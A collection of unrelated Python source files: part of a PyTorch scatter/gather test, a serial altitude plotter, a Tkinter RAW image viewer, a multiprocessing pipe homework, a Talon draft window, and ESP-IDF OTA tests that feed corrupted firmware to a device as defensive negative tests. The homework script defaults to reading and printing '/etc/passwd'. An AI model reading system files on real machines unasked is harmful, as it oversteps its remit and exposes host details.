class TestNamedTupleInput_1(NamedTuple):
a: torch.tensor
b: torch.tensor
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=0)
a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
inp = TestNamedTupleInput_1(a, b)
scatter_out = scatter_gather.scatter(inp, target_gpus)
for i, x in enumerate(scatter_out):
self.assertTrue(isinstance(x, type(inp)))
self.assertEqual(x._fields, fields)
expected_a = a_tensors_for_gpu[i]
expected_b = b_tensors_for_gpu[i]
self.assertEqual(expected_a, x.a)
self.assertEqual(expected_b, x.b)
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_gather_namedtuple(self):
# tests ability to gather a list of namedtuples and return a namedtuple where each
# element is of the expected tensor type.
fields = ['a', 'b']
TestNamedTupleInput_0 = collections.namedtuple('NamedTuple', fields)
num_gpus = torch.cuda.device_count()
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=1)
out1 = TestNamedTupleInput_0(a, b)
a = torch.rand(num_gpus * 2, device=1)
b = torch.rand(num_gpus * 2, device=0)
out2 = TestNamedTupleInput_0(a, b)
outputs = [out1, out2]
out = scatter_gather.gather(outputs, 'cpu') # test on CPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1]))) # x must be a tensor
cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu')))
self.assertTrue(torch.equal(x, cat))
out = scatter_gather.gather(outputs, 0) # test on GPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0)))
self.assertTrue(torch.equal(x, cat))
class TestNamedTupleInput_1(NamedTuple):
a: torch.tensor
b: torch.tensor
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=1)
out1 = TestNamedTupleInput_1(a, b)
a = torch.rand(num_gpus * 2, device=1)
b = torch.rand(num_gpus * 2, device=0)
out2 = TestNamedTupleInput_1(a, b)
outputs = [out1, out2]
out = scatter_gather.gather(outputs, 0) # test on GPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0)))
self.assertTrue(torch.equal(x, cat))
out = scatter_gather.gather(outputs, 'cpu') # test on CPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu')))
self.assertTrue(torch.equal(x, cat))
if __name__ == '__main__':
run_tests()
|
altitude_plot.py
|
#!/usr/bin/env python3
'''
Dependencies: numpy, matplotlib, https://github.com/simondlevy/RealtimePlotter
Copyright (C) 2021 Simon D. Levy
MIT License
'''
import serial
from realtime_plot import RealtimePlotter
import numpy as np
from threading import Thread
from sys import argv, stdout
# Change these to suit your needs
PORT = '/dev/ttyACM0'
BAUD = 115200
NTICKS = 10
class SerialPlotter(RealtimePlotter):
def __init__(self):
ranges = [(-1,5), (-5,+5), (-5,+5)]
RealtimePlotter.__init__(self,
ranges,
show_yvals=True,
ylabels=['Altitude', 'Variometer', 'FirstDiff'],
window_name='Altitude Estimation',
styles=['b', 'r', 'g'])
self.tick = 0
self.vals = None
def getValues(self):
return self.vals
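# Note: _update below assumes each serial line holds three whitespace-separated floats
# matching the ylabels above (Altitude, Variometer, FirstDiff), e.g. a line such as
# "1.25 0.03 0.04" (example values, not from a real device).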
def _update(port, plotter):
while True:
plotter.vals = [float(s) for s in port.readline().decode()[:-1].split()]
plotter.tick += 1
if __name__ == '__main__':
port = argv[1] if len(argv) > 1 else PORT
try:
port = serial.Serial(port, BAUD)
except serial.SerialException:
        print('Unable to open device on port %s' % port)
exit(1)
plotter = SerialPlotter()
thread = Thread(target=_update, args = (port, plotter))
thread.daemon = True
thread.start()
plotter.start()
|
Day05-00-2.py
|
## Image processing & data analysis tool
## (1) Preview large images at 128x128
##     Data processing is unchanged; only display() downsamples to 128x128.
## (2) Display runs on a thread
## (3) Show the file name and size in the status bar
from tkinter import *
from tkinter.filedialog import *
from tkinter.simpledialog import *
import os.path
import math
## Function definitions
def loadImage(fname) :
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH, status
    fsize = os.path.getsize(fname)  # check the file size
    inH = inW = int(math.sqrt(fsize))  # decide the input buffer size (important!)
    inImage = []; tmpList = []
    for i in range(inH) :  # allocate the input buffer (initialized to 0)
        tmpList = []
        for k in range(inW) :
            tmpList.append(0)
        inImage.append(tmpList)
    # load the data from the file into memory
    fp = open(fname, 'rb')  # open the file in binary mode
    for i in range(inH) :
        for k in range(inW) :
            inImage[i][k] = int(ord(fp.read(1)))
    fp.close()
def openFile() :
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH, status
    filename = askopenfilename(parent=window,
                               filetypes=(("RAW files", "*.raw"), ("All files", "*.*")))
    inImage.clear(); outImage.clear()
    loadImage(filename)  # file --> input buffer
    equal()  # input buffer --> output buffer
    # show the file info in the status bar
    statusStr = 'File name: ' + filename + "\nFile size: " + str(inW) + "x" + str(inH)
    status.configure(text=statusStr)
import threading
def display() :
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH, VIEW_X, VIEW_Y
    # Compute the sampling STEP for the image to display.
    VIEW_X, VIEW_Y = 128, 128
    if VIEW_X > outW or VIEW_Y > outH :  # if the result image is smaller than 128
        VIEW_X = outW; VIEW_Y = outH
        step = 1
    else :
        step = int(outW / VIEW_X)
    print(outW, VIEW_X, step)
    # Tear down the previous canvas if one exists.
    if canvas != None :
        canvas.destroy()
    # Prepare the window (fixed size).
    window.geometry(str(VIEW_X*2) + 'x' + str(VIEW_Y*2))
    canvas = Canvas(window, width=VIEW_X, height=VIEW_Y)
    paper = PhotoImage(width=VIEW_X, height=VIEW_Y)
    canvas.create_image((VIEW_X/2, VIEW_Y/2), image=paper, state='normal')
    # Draw to the screen.
    def putPixel():
        for i in range(0, outH, step) :
            for k in range(0, outW, step) :
                data = outImage[i][k]
                paper.put('#%02x%02x%02x' % (data, data, data), (int(k/step), int(i/step)))
    threading.Thread(target=putPixel).start()
    canvas.pack(expand=1, anchor=CENTER)
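# Illustrative sketch only (not wired to the menu code): the same nearest-neighbor
# subsampling that putPixel() performs, written as a standalone function over a plain
# 2D list so the step arithmetic is easier to follow.
def subsample(image, view_w, view_h):
    src_h = len(image); src_w = len(image[0])
    step_h = max(1, src_h // view_h)  # keep every step_h-th row
    step_w = max(1, src_w // view_w)  # keep every step_w-th column
    return [[image[i][k] for k in range(0, src_w, step_w)]
            for i in range(0, src_h, step_h)]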
def equal() :  # identity (copy) algorithm
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    # Important! Decide the size of the output buffer.
    outW = inW; outH = inH
    outImage = []; tmpList = []
    for i in range(outH):  # allocate the output buffer (initialized to 0)
        tmpList = []
        for k in range(outW):
            tmpList.append(0)
        outImage.append(tmpList)
    #############################
    # The actual image-processing algorithm
    #############################
    for i in range(inH) :
        for k in range(inW) :
            outImage[i][k] = inImage[i][k]
    display()
def addImage() :  # brighten algorithm
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    # Important! Decide the size of the output buffer.
    outW = inW; outH = inH
    outImage = []; tmpList = []
    for i in range(outH):  # allocate the output buffer (initialized to 0)
        tmpList = []
        for k in range(outW):
            tmpList.append(0)
        outImage.append(tmpList)
    #############################
    # The actual image-processing algorithm
    #############################
    value = askinteger('Brighten', 'Amount to brighten -->', minvalue=1, maxvalue=255)
    for i in range(inH) :
        for k in range(inW) :
            if inImage[i][k] + value > 255 :
                outImage[i][k] = 255
            else :
                outImage[i][k] = inImage[i][k] + value
    display()
def saveFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
pass
def exitFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
pass
## Global variables
window, canvas, paper, filename = [None] * 4
inImage, outImage = [], []; inW, inH, outW, outH = [0] * 4
VIEW_X, VIEW_Y = 128, 128  # display size is fixed
status = None
## Main code
window = Tk(); window.geometry('400x400')
window.title('Image Processing & Data Analysis')
status = Label(window, text="Image info", bd=1, relief=SUNKEN, anchor=W)
status.pack(side=BOTTOM, fill=X)
mainMenu = Menu(window); window.config(menu=mainMenu)
fileMenu = Menu(mainMenu); mainMenu.add_cascade(label='File', menu=fileMenu)
fileMenu.add_command(label='Open', command=openFile)
fileMenu.add_command(label='Save', command=saveFile)
fileMenu.add_separator()
fileMenu.add_command(label='Exit', command=exitFile)
pixelMenu = Menu(mainMenu); mainMenu.add_cascade(label='Pixel operations', menu=pixelMenu)
pixelMenu.add_command(label='Identity', command=equal)
pixelMenu.add_command(label='Brighten', command=addImage)
window.mainloop()
|
hw2.py
|
'''
2. Implemented with the multiprocessing model: the parent process sends the file named
   on the command line to the child process, and the child prints what it receives.
Usage: python hw2.py "/etc/passwd"
'''
import sys
from multiprocessing import Pipe, Process
def job(inn, out):
    # Child: close the unused copy of the sending end, then print every line
    # received until the parent closes its end and recv() raises EOFError.
    inn.close()
    while True:
        try:
            print(out.recv(), end='')
        except EOFError:
            out.close()
            break
if __name__ == '__main__':
    # Parent: read the file named on the command line (see the docstring above)
    # and send it line by line to the child over the pipe.
    filename = sys.argv[1] if len(sys.argv) > 1 else '/etc/passwd'
    in_pipe, out_pipe = Pipe()
    p = Process(target=job, args=(in_pipe, out_pipe))
    p.start()
    out_pipe.close()
    with open(filename, 'r') as f:
        for line in f:
            in_pipe.send(line)
    in_pipe.close()
    p.join()
|
draftwindow.py
|
from tkinter import *
from tkinter import font
import threading
import socket
import time
class DraftWindow():
def __init__(self):
threading.Thread(target=self.spawn, daemon=False).start()
def spawn(self):
while True: # recreate the window when closed
self.gui = Tk()
self.gui.client(socket.gethostname())
self.gui.title("Talon Draft")
w = self.gui.winfo_screenwidth()
h = self.gui.winfo_screenheight()
f = font.nametofont("TkFixedFont").actual()
self.gui.geometry(f"{int(w*0.8)}x{int(h*0.7)}+{int(w*0.1)}+{int(h*0.15)}")
self.text = Text(self.gui, font=(f['family'], 40), height=1, width=1)
self.text.pack(side=TOP, fill=BOTH, expand=True)
# buffers for thread communication
self.content = ""
self.insertQueue = []
self.action = ""
self.text.tag_add("highlight", "1.0", "1.0")
self.text.tag_config("highlight", foreground="red")
self.text.bind("<Any-Motion>", self.on_mouse_move)
self.text.bind("<Button>", self.on_click)
self.text.bind("<<Modified>>", self.on_change)
self.onChangeSentinel = False
self.statusbar = Label(self.gui, text="status bar", bd=1, relief=SUNKEN, anchor=W)
self.statusbar.pack(side=BOTTOM, fill=X)
self.close()
self.poll()
self.gui.mainloop()
def poll(self):
if len(self.insertQueue) > 0:
self.text.insert(INSERT, self.insertQueue.pop(0))
if self.action == "show":
self.action = ""
self.gui.deiconify()
self.gui.lift()
self.gui.focus_force()
self.text.focus()
if self.action == "close":
self.action = ""
self.text.delete("1.0", "end")
self.gui.withdraw()
self.gui.after(10, self.poll)
def on_mouse_move(self, event):
self.text.tag_remove("highlight", "1.0", "end")
index = self.text.index("@%s,%s" % (event.x, event.y))
self.text.tag_add("highlight", index + " wordstart", index + " wordend")
def on_click(self, event):
index = self.text.index("highlight.first")
word = self.text.get("highlight.first", "highlight.last")
if word == '\n':
return
self.text.delete("highlight.first", "highlight.last")
if word[0] == word[0].lower():
self.text.insert(index, word[0].upper() + word[1:])
else:
self.text.insert(index, word[0].lower() + word[1:])
def on_change(self, event):
if self.onChangeSentinel:
self.onChangeSentinel = False
return
self.content = self.text.get("1.0", "end-1c")
self.statusbar['text'] = self.content.replace('\n', '\\n')
self.onChangeSentinel = True
self.text.tk.call(self.text._w, 'edit', 'modified', 0)
def insert(self, string):
self.insertQueue.append(string)
def get_content(self):
return self.content
def show(self):
self.action = "show"
def close(self):
self.action = "close"
from talon import Module
#from .draftwindow import DraftWindow
mod = Module()
window = DraftWindow()
@mod.action_class
class Actions:
def show_draft_window():
"""shows draft window"""
window.show()
def close_draft_window():
"""closes draft window"""
window.close()
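# Hedged usage sketch (not part of the original module): callers never touch the
# Tk objects directly; they only write to the insertQueue/content/action buffers,
# which poll() drains on the Tk thread every 10 ms.
def _demo_draft_window(draft):
    draft.show()                 # queued; applied on the next poll() tick
    draft.insert("hello world")  # text appears once poll() runs
    time.sleep(0.1)              # give the Tk thread a moment to catch up
    print(draft.get_content())   # last snapshot captured by on_change()
    draft.close()                # hides the window and clears the text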
|
example_test.py
|
import http.server
import multiprocessing
import os
import random
import re
import socket
import ssl
import struct
import subprocess
import ttfw_idf
from RangeHTTPServer import RangeRequestHandler
from tiny_test_fw import DUT, Utility
server_file = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'test_certs/server_cert.pem')
key_file = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'test_certs/server_key.pem')
def get_my_ip():
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.connect(('8.8.8.8', 80))
my_ip = s1.getsockname()[0]
s1.close()
return my_ip
def get_server_status(host_ip, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_status = sock.connect_ex((host_ip, port))
sock.close()
if server_status == 0:
return True
return False
def https_request_handler():
"""
Returns a request handler class that handles broken pipe exception
"""
class RequestHandler(RangeRequestHandler):
def finish(self):
try:
if not self.wfile.closed:
self.wfile.flush()
self.wfile.close()
except socket.error:
pass
self.rfile.close()
def handle(self):
try:
RangeRequestHandler.handle(self)
except socket.error:
pass
return RequestHandler
def start_https_server(ota_image_dir, server_ip, server_port):
os.chdir(ota_image_dir)
requestHandler = https_request_handler()
httpd = http.server.HTTPServer((server_ip, server_port), requestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
def start_chunked_server(ota_image_dir, server_port):
os.chdir(ota_image_dir)
chunked_server = subprocess.Popen(['openssl', 's_server', '-WWW', '-key', key_file, '-cert', server_file, '-port', str(server_port)])
return chunked_server
def redirect_handler_factory(url):
"""
Returns a request handler class that redirects to supplied `url`
"""
class RedirectHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
print('Sending resp, URL: ' + url)
self.send_response(301)
self.send_header('Location', url)
self.end_headers()
def handle(self):
try:
http.server.BaseHTTPRequestHandler.handle(self)
except socket.error:
pass
return RedirectHandler
def start_redirect_server(ota_image_dir, server_ip, server_port, redirection_port):
os.chdir(ota_image_dir)
redirectHandler = redirect_handler_factory('https://' + server_ip + ':' + str(redirection_port) + '/advanced_https_ota.bin')
httpd = http.server.HTTPServer((server_ip, server_port), redirectHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
@ttfw_idf.idf_example_test(env_tag='EXAMPLE_ETH_OTA')
def test_examples_protocol_advanced_https_ota_example(env, extra_data):
"""
    This is a positive test case, which downloads the complete binary file multiple times.
    The number of iterations can be specified in the variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
# Number of iterations to validate OTA
iterations = 3
server_port = 8001
# File to be downloaded. This file is generated after compilation
bin_name = 'advanced_https_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = multiprocessing.Process(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
for i in range(iterations):
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' (sta|eth) ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.terminate()
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting Advanced OTA example', timeout=30)
dut1.reset()
thread1.terminate()
@ttfw_idf.idf_example_test(env_tag='EXAMPLE_ETH_OTA')
def test_examples_protocol_advanced_https_ota_example_truncated_bin(env, extra_data):
"""
    This test case validates OTA behaviour when the binary file is truncated.
    The application should return an error message in this case.
steps: |
1. join AP
2. Generate truncated binary file
3. Fetch OTA image over HTTPS
4. Check working of code if bin is truncated
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Original binary file generated after compilation
bin_name = 'advanced_https_ota.bin'
# Truncated binary file to be generated from original binary file
truncated_bin_name = 'truncated.bin'
    # Size of the truncated file to be generated. This value can range from 288 bytes (image header size) to the size of the original binary file
    # truncated_bin_size is set to 64000 to reduce the time consumed by the test case
truncated_bin_size = 64000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, 'rb+')
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), 'wb+')
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = multiprocessing.Process(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' (sta|eth) ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.terminate()
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name)
dut1.expect('Image validation failed, image is corrupted', timeout=30)
os.remove(binary_file)
thread1.terminate()
@ttfw_idf.idf_example_test(env_tag='EXAMPLE_ETH_OTA')
def test_examples_protocol_advanced_https_ota_example_truncated_header(env, extra_data):
"""
    This test case validates OTA behaviour when the headers of the binary file are truncated.
    The application should return an error message in this case.
steps: |
1. join AP
2. Generate binary file with truncated headers
3. Fetch OTA image over HTTPS
4. Check working of code if headers are not sent completely
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Original binary file generated after compilation
bin_name = 'advanced_https_ota.bin'
# Truncated binary file to be generated from original binary file
truncated_bin_name = 'truncated_header.bin'
    # Size of the truncated file to be generated. This value should be less than 288 bytes (image header size)
truncated_bin_size = 180
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, 'rb+')
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), 'wb+')
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = multiprocessing.Process(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' (sta|eth) ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.terminate()
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name)
dut1.expect('advanced_https_ota_example: esp_https_ota_read_img_desc failed', timeout=30)
os.remove(binary_file)
thread1.terminate()
@ttfw_idf.idf_example_test(env_tag='EXAMPLE_ETH_OTA')
def test_examples_protocol_advanced_https_ota_example_random(env, extra_data):
"""
    This test case validates OTA behaviour when the binary file consists of random data.
    Magic byte verification should fail in this case.
steps: |
1. join AP
2. Generate random binary image
3. Fetch OTA image over HTTPS
4. Check working of code for random binary file
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Random binary file to be generated
random_bin_name = 'random.bin'
    # Size of the random binary file. 32000 is chosen to reduce the time required to run the test case
random_bin_size = 32000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, random_bin_name)
fo = open(binary_file, 'wb+')
    # The first byte of the binary file is always set to zero. If it were generated randomly,
    # it could come out as 0xE9 (the image magic byte), which would make the test case fail.
fo.write(struct.pack('B', 0))
for i in range(random_bin_size - 1):
fo.write(struct.pack('B', random.randrange(0,255,1)))
fo.close()
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = multiprocessing.Process(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' (sta|eth) ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.terminate()
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + random_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + random_bin_name)
dut1.expect(re.compile(r'esp_https_ota: Mismatch chip id, expected 0, found \d'), timeout=10)
os.remove(binary_file)
thread1.terminate()
@ttfw_idf.idf_example_test(env_tag='EXAMPLE_ETH_OTA')
def test_examples_protocol_advanced_https_ota_example_chunked(env, extra_data):
"""
    This is a positive test case, which downloads the complete binary file from the
    chunked server started by start_chunked_server.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
# File to be downloaded. This file is generated after compilation
bin_name = 'advanced_https_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
chunked_server = start_chunked_server(dut1.app.binary_path, 8070)
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' (sta|eth) ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':8070/' + bin_name))
dut1.write('https://' + host_ip + ':8070/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting Advanced OTA example', timeout=30)
chunked_server.kill()
@ttfw_idf.idf_example_test(env_tag='EXAMPLE_ETH_OTA')
def test_examples_protocol_advanced_https_ota_example_redirect_url(env, extra_data):
"""
    This is a positive test case, which starts an OTA server and a redirection server.
    The redirection server redirects the HTTP request to a different port.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
    # Port to which the request should be redirected
redirection_server_port = 8081
# File to be downloaded. This file is generated after compilation
bin_name = 'advanced_https_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = multiprocessing.Process(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
thread2 = multiprocessing.Process(target=start_redirect_server, args=(dut1.app.binary_path, host_ip, redirection_server_port, server_port))
thread2.daemon = True
thread2.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' (sta|eth) ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.terminate()
thread2.terminate()
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(redirection_server_port) + '/' + bin_name))
dut1.write('https://' + host_ip + ':' + str(redirection_server_port) + '/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting Advanced OTA example', timeout=30)
dut1.reset()
thread1.terminate()
thread2.terminate()
@ttfw_idf.idf_example_test(env_tag='Example_8Mflash_Ethernet')
def test_examples_protocol_advanced_https_ota_example_anti_rollback(env, extra_data):
"""
    This test case validates OTA behaviour when anti_rollback is enabled and the security version of the new image is lower than the current one.
    The application should return an error message in this case.
steps: |
1. join AP
2. Generate binary file with lower security version
3. Fetch OTA image over HTTPS
4. Check working of anti_rollback feature
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT, app_config_name='anti_rollback')
Utility.console_log('Erasing the flash on the chip')
# erase the flash
dut1.erase_flash()
server_port = 8001
# Original binary file generated after compilation
bin_name = 'advanced_https_ota.bin'
    # Firmware image with a lowered security version in its header, used to enable the negative test case
anti_rollback_bin_name = 'advanced_https_ota_lower_sec_version.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
file_size = os.path.getsize(binary_file)
f = open(binary_file, 'rb+')
fo = open(os.path.join(dut1.app.binary_path, anti_rollback_bin_name), 'wb+')
fo.write(f.read(file_size))
# Change security_version to 0 for negative test case
fo.seek(36)
fo.write(b'\x00')
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, anti_rollback_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = multiprocessing.Process(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
# Positive Case
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' (sta|eth) ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.terminate()
dut1.expect('Starting Advanced OTA example', timeout=30)
# Use originally generated image with secure_version=1
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect(re.compile(r' (sta|eth) ip: ([^,]+),'), timeout=30)
dut1.expect('App is valid, rollback cancelled successfully', 30)
# Negative Case
dut1.expect('Starting Advanced OTA example', timeout=30)
# Use modified image with secure_version=0
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + anti_rollback_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + anti_rollback_bin_name)
dut1.expect('New firmware security version is less than eFuse programmed, 0 < 1', timeout=30)
os.remove(binary_file)
thread1.terminate()
@ttfw_idf.idf_example_test(env_tag='EXAMPLE_ETH_OTA')
def test_examples_protocol_advanced_https_ota_example_partial_request(env, extra_data):
"""
    This is a positive test case that exercises the OTA workflow with the HTTP Range header (partial downloads).
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT, app_config_name='partial_download')
server_port = 8001
# Size of partial HTTP request
request_size = 16384
# File to be downloaded. This file is generated after compilation
bin_name = 'advanced_https_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
http_requests = int((bin_size / request_size) - 1)
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = multiprocessing.Process(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
